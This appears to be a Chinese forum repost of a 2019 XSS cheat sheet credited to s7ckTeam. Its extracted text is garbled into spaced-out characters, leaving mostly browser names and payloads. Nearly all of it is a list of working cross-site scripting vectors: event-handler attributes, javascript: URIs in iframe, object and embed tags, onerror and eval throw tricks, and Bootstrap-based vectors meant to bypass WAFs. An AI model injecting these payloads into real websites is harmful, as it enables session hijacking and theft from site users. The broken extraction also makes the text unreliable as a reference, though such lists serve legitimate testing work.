[956] 2019-12-16_跨站脚本(XSS)备忘录-2019版

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-16
2019-12-16_跨站脚本(XSS)备忘录-2019版 X S S - 2 0 1 9   B y p a s s   B y p a s s   2 0 1 9 - 1 2 - 1 6 X S S X S S W A F P o r t s w i g g e r W e b 2 0 1 9 B u r p   s u i t e 2 0 1 9 1 1 8 1 0 : 5 8 : 0 7 ( I E ) C h r o m e F i r e f o x I E ) C S S ( F i r e f o x ) C S S C h r o m e F i r e f o x I E S a f a r i ) C S S C h r o m e F i r e f o x I E S a f a r i ) C S S C h r o m e F i r e f o x I E S a f a r i ) I E < a   i d = x   t a b i n d e x = 1   o n a c t i v a t e = a l e r t ( 1 ) > < / a > < b o d y   o n a f t e r p r i n t = a l e r t ( 1 ) > < s t y l e > @ k e y f r a m e s   x { f r o m   { l e f t : 0 ; } t o   { l e f t :   1 0 0 0 p x ; } } : t a r g e t   { a n i m a t i o n : 1 0 s   e a s e - i n - o u t   0 s   1   x ; } < / s t y l e > < a   i d = x   s t y l e = " p o s i t i o n : a b s o l u t e ; "   o n a n i m a t i o n c a n c e l = " a l e r t ( 1 ) " > < / a > < s t y l e > @ k e y f r a m e s   x { } < / s t y l e > < a   s t y l e = " a n i m a t i o n - n a m e : x "   o n a n i m a t i o n e n d = " a l e r t ( 1 ) " > < / a > < s t y l e > @ k e y f r a m e s   s l i d e i n   { } < / s t y l e > < a   s t y l e = " a n i m a t i o n - d u r a t i o n : 1 s ; a n i m a t i o n - n a m e : s l i d e i n ; a n i m a t i o n - i t e r a t i o n - c o u n t : 2 "   o n a n i m a t i o n i t e r a t i o n = " a l e r t ( 1 ) " > < / a > < s t y l e > @ k e y f r a m e s   x { } < / s t y l e > < a   s t y l e = " a n i m a t i o n - n a m e : x "   o n a n i m a t i o n s t a r t = " a l e r t ( 1 ) " > < / a > < a   i d = x   t a b i n d e x = 1   o n b e f o r e a c t i v a t e = a l e r t ( 1 ) > < / a >
I E C h r o m e F i r e f o x I E ) C h r o m e s v g C h r o m e F i r e f o x S a f a r i C h r o m e I E S a f a r i F i r e f o x I E C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) I E C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i )   < a   i d = x   t a b i n d e x = 1   o n b e f o r e d e a c t i v a t e = a l e r t ( 1 ) > < / a > < i n p u t   a u t o f o c u s > < b o d y   o n b e f o r e p r i n t = a l e r t ( 1 ) > < s v g > < a n i m a t e   o n b e g i n = a l e r t ( 1 )   a t t r i b u t e N a m e = x   d u r = 1 s > < s v g > < a n i m a t e   o n b e g i n = a l e r t ( 1 )   a t t r i b u t e N a m e = x   d u r = 1 s > < a   o n b l u r = a l e r t ( 1 )   t a b i n d e x = 1   i d = x > < / a > < i n p u t   a u t o f o c u s > < m a r q u e e   w i d t h = 1   l o o p = 1   o n b o u n c e = a l e r t ( 1 ) > X S S < / m a r q u e e > < a u d i o   o n c a n p l a y = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < v i d e o   o n c a n p l a y t h r o u g h = a l e r t ( 1 ) > < s o u r c e   > < / v i d e o > < a   i d = x   t a b i n d e x = 1   o n d e a c t i v a t e = a l e r t ( 1 ) > < / a > < i n p u t   i d = y   a u t o f o c u s > < a u d i o   c o n t r o l s   a u t o p l a y   o n e n d e d = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < a u d i o   s r c / o n e r r o r = a l e r t ( 1 ) >
F i r e f o x I E ) C h r o m e I E S a f a r i ) C h r o m e I E S a f a r i ) C h r o m e I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) F i r e f o x ) F i r e f o x ) p o s t M e s s a g e C h r o m e F i r e f o x I E S a f a r i ) < m a r q u e e   w i d t h = 1   l o o p = 1   o n f i n i s h = a l e r t ( 1 ) > X S S < / m a r q u e e >   < a   i d = x   t a b i n d e x = 1   o n f o c u s = a l e r t ( 1 ) > < / a > < a   i d = x   t a b i n d e x = 1   o n f o c u s i n = a l e r t ( 1 ) > < / a > < a   o n f o c u s o u t = a l e r t ( 1 )   t a b i n d e x = 1   i d = x > < / a > < i n p u t   a u t o f o c u s > < b o d y   o n h a s h c h a n g e = " a l e r t ( 1 ) " > < s v g > < a   o n l o a d = a l e r t ( 1 ) > < / a > < a u d i o   o n l o a d e d d a t a = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < a u d i o   a u t o p l a y   o n l o a d e d m e t a d a t a = a l e r t ( 1 ) >   < s o u r c e   > < / a u d i o > < i m a g e   s r c = v a l i d i m a g e . p n g   o n l o a d e n d = a l e r t ( 1 ) > < i m a g e   s r c = v a l i d i m a g e . p n g   o n l o a d s t a r t = a l e r t ( 1 ) > < b o d y   o n m e s s a g e = a l e r t ( 1 ) >
C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) s v g C h r o m e F i r e f o x S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) F i r e f o x I E ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C S S F i r e f o x ) < b o d y   o n p a g e s h o w = a l e r t ( 1 ) > < a u d i o   a u t o p l a y   o n p l a y = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < a u d i o   a u t o p l a y   o n p l a y i n g = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o >   < b o d y   o n p o p s t a t e = a l e r t ( 1 ) > < s v g > < a n i m a t e   o n r e p e a t = a l e r t ( 1 )   a t t r i b u t e N a m e = x   d u r = 1 s   r e p e a t C o u n t = 2   / > < b o d y   o n r e s i z e = " a l e r t ( 1 ) " > < b o d y   o n s c r o l l = a l e r t ( 1 ) > < d i v   s t y l e = h e i g h t : 1 0 0 0 p x > < / d i v > < d i v   i d = x > < / d i v > < m a r q u e e   o n s t a r t = a l e r t ( 1 ) > X S S < / m a r q u e e > < a u d i o   c o n t r o l s   a u t o p l a y   o n t i m e u p d a t e = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < d e t a i l s   o n t o g g l e = a l e r t ( 1 )   o p e n > t e s t < / d e t a i l s >
C S S C h r o m e ) C S S F i r e f o x ) F i r e f o x ) I E 使 C h r o m e F i r e f o x ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) I E C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) < s t y l e > : t a r g e t   { c o l o r :   r e d ; } < / s t y l e > < a   i d = x   s t y l e = " t r a n s i t i o n : c o l o r   1 0 s "   o n t r a n s i t i o n c a n c e l = a l e r t ( 1 ) > < / a > < s t y l e > : t a r g e t   { c o l o r : r e d ; } < / s t y l e > < a   i d = x   s t y l e = " t r a n s i t i o n : c o l o r   1 s "   o n t r a n s i t i o n e n d = a l e r t ( 1 ) > < / a > < s t y l e > : t a r g e t   { t r a n s f o r m :   r o t a t e ( 1 8 0 d e g ) ; } < / s t y l e > < a   i d = x   s t y l e = " t r a n s i t i o n : t r a n s f o r m   2 s "   o n t r a n s i t i o n r u n = a l e r t ( 1 ) > < / a > < b o d y   o n u n h a n d l e d r e j e c t i o n = a l e r t ( 1 ) > < s c r i p t > f e t c h ( ' / / x y z ' ) < / s c r i p t > < v i d e o   a u t o p l a y   c o n t r o l s   o n w a i t i n g = a l e r t ( 1 ) > < s o u r c e     t y p e = v i d e o / m p 4 > < / v i d e o > < i n p u t   o n a u x c l i c k = a l e r t ( 1 ) > < a   o n b e f o r e c o p y = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n b e f o r e c u t = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n b e f o r e p a s t e = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < i n p u t   o n c h a n g e = a l e r t ( 1 )   v a l u e = x s s >
C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) < a   o n c l i c k = " a l e r t ( 1 ) " > t e s t < / a > < a   o n c o n t e x t m e n u = " a l e r t ( 1 ) " > t e s t < / a > < a   o n c o p y = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n c u t = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n d b l c l i c k = " a l e r t ( 1 ) " > t e s t < / a > < a   d r a g g a b l e = " t r u e "   o n d r a g = " a l e r t ( 1 ) " > t e s t < / a > < a   d r a g g a b l e = " t r u e "   o n d r a g e n d = " a l e r t ( 1 ) " > t e s t < / a > < a   d r a g g a b l e = " t r u e "   o n d r a g e n t e r = " a l e r t ( 1 ) " > t e s t < / a > < a   d r a g g a b l e = " t r u e "   o n d r a g l e a v e = " a l e r t ( 1 ) " > t e s t < / a > < d i v   d r a g g a b l e = " t r u e "   c o n t e n t e d i t a b l e > d r a g   m e < / d i v > < a   o n d r a g o v e r = a l e r t ( 1 )   c o n t e n t e d i t a b l e > d r o p   h e r e < / a > < a   d r a g g a b l e = " t r u e "   o n d r a g s t a r t = " a l e r t ( 1 ) " > t e s t < / a >
C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) < d i v   d r a g g a b l e = " t r u e "   c o n t e n t e d i t a b l e > d r a g   m e < / d i v > < a   o n d r o p = a l e r t ( 1 )   c o n t e n t e d i t a b l e > d r o p   h e r e < / a > < i n p u t   o n i n p u t = a l e r t ( 1 )   v a l u e = x s s > < f o r m > < i n p u t   o n i n v a l i d = a l e r t ( 1 )   r e q u i r e d > < i n p u t   t y p e = s u b m i t > < a   o n k e y d o w n = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n k e y p r e s s = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n k e y u p = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a   o n m o u s e d o w n = " a l e r t ( 1 ) " > t e s t < / a > < a   o n m o u s e e n t e r = " a l e r t ( 1 ) " > t e s t < / a > < a   o n m o u s e l e a v e = " a l e r t ( 1 ) " > t e s t < / a > < a   o n m o u s e m o v e = " a l e r t ( 1 ) " > t e s t < / a > < a   o n m o u s e o u t = " a l e r t ( 1 ) " > t e s t < / a >
C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) t y p e C h r o m e C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e F i r e f o x I E S a f a r i ) C h r o m e ) < a   o n m o u s e o v e r = " a l e r t ( 1 ) " > t e s t < / a > < a   o n m o u s e u p = " a l e r t ( 1 ) " > t e s t < / a > < a   o n p a s t e = " a l e r t ( 1 ) "   c o n t e n t e d i t a b l e > t e s t < / a > < a u d i o   a u t o p l a y   c o n t r o l s   o n p a u s e = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < f o r m   o n r e s e t = a l e r t ( 1 ) > < i n p u t   t y p e = r e s e t > < f o r m > < i n p u t   t y p e = s e a r c h   o n s e a r c h = a l e r t ( 1 )   v a l u e = " H i t   r e t u r n "   a u t o f o c u s > < a u d i o   a u t o p l a y   c o n t r o l s   o n s e e k e d = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < a u d i o   a u t o p l a y   c o n t r o l s   o n s e e k i n g = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < i n p u t   o n s e l e c t = a l e r t ( 1 )   v a l u e = " X S S "   a u t o f o c u s > < f o r m   o n s u b m i t = a l e r t ( 1 ) > < i n p u t   t y p e = s u b m i t > < s v g   o n u n l o a d = w i n d o w . o p e n ( ' j a v a s c r i p t : a l e r t ( 1 ) ' ) >
C h r o m e F i r e f o x I E S a f a r i ) 使 C h r o m e F i r e f o x I E S a f a r i ) 使 使 使 e v i l F i r e f o x 使 e v i l 使 E S 6   h a s I n s t a n c e i n s t a n c e o f e v a l 使 E S 6 h a s I n s t a n c e i n s t a n c e o f e v a l 使 < a u d i o   a u t o p l a y   c o n t r o l s   o n v o l u m e c h a n g e = a l e r t ( 1 ) > < s o u r c e   > < / a u d i o > < b o d y   o n w h e e l = a l e r t ( 1 ) > < s c r i p t > o n e r r o r = a l e r t ; t h r o w   1 < / s c r i p t > < s c r i p t > { o n e r r o r = a l e r t } t h r o w   1 < / s c r i p t > < s c r i p t > t h r o w   o n e r r o r = a l e r t , 1 < / s c r i p t > < s c r i p t > t h r o w   o n e r r o r = e v a l , ' = a l e r t x 2 8 1 x 2 9 ' < / s c r i p t > < s c r i p t > { o n e r r o r = e v a l } t h r o w { l i n e N u m b e r : 1 , c o l u m n N u m b e r : 1 , f i l e N a m e : 1 , m e s s a g e : ' a l e r t x 2 8 1 x 2 9 ' } < / s c r i p t > < s c r i p t > ' a l e r t x 2 8 1 x 2 9 ' i n s t a n c e o f { [ S y m b o l . h a s I n s t a n c e ] : e v a l } < / s c r i p t > < s c r i p t > ' a l e r t x 2 8 1 x 2 9 ' i n s t a n c e o f { [ S y m b o l [ ' h a s I n s t a n c e ' ] ] : e v a l } < / s c r i p t > < s c r i p t > l o c a t i o n = ' j a v a s c r i p t : a l e r t x 2 8 1 x 2 9 ' < / s c r i p t >
使 使 B o o t s t r a p   o n a n i m a t i o n s t a r t B o o t s t r a p   o n t r a n s i t i o n e n d i f r a m e   s r c J a v a S c r i p t J a v a S c r i p t d a t a 使 J a v a S c r i p t s r c J a v a S c r i p t 使 x 0 1 -   x 2 0 < s c r i p t > l o c a t i o n = n a m e < / s c r i p t > < s c r i p t > a l e r t ` 1 ` < / s c r i p t > < x s s   c l a s s = p r o g r e s s - b a r - a n i m a t e d   o n a n i m a t i o n s t a r t = a l e r t ( 1 ) > < x s s   c l a s s = " c a r o u s e l   s l i d e "   d a t a - r i d e = c a r o u s e l   d a t a - i n t e r v a l = 1 0 0   o n t r a n s i t i o n e n d = a l e r t ( 1 ) > < x s s   c l a s s = c a r o u s e l - i n n e r > < x s s   c l a s s = " c a r o u s e l - i t e m   a c t i v e " > < / x s s > < x s s   c l a s s = c a r o u s e l - i t e m > < / x s s > < / x s s > < / x s s > < i f r a m e   s r c = " j a v a s c r i p t : a l e r t ( 1 ) " > < o b j e c t   d a t a = " j a v a s c r i p t : a l e r t ( 1 ) " > < e m b e d   s r c = " j a v a s c r i p t : a l e r t ( 1 ) " > < a   h r e f = " j a v a s c r i p t : a l e r t ( 1 ) " > X S S < / a > < a   h r e f = " J a V a S c r i p t : a l e r t ( 1 ) " > X S S < / a >
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则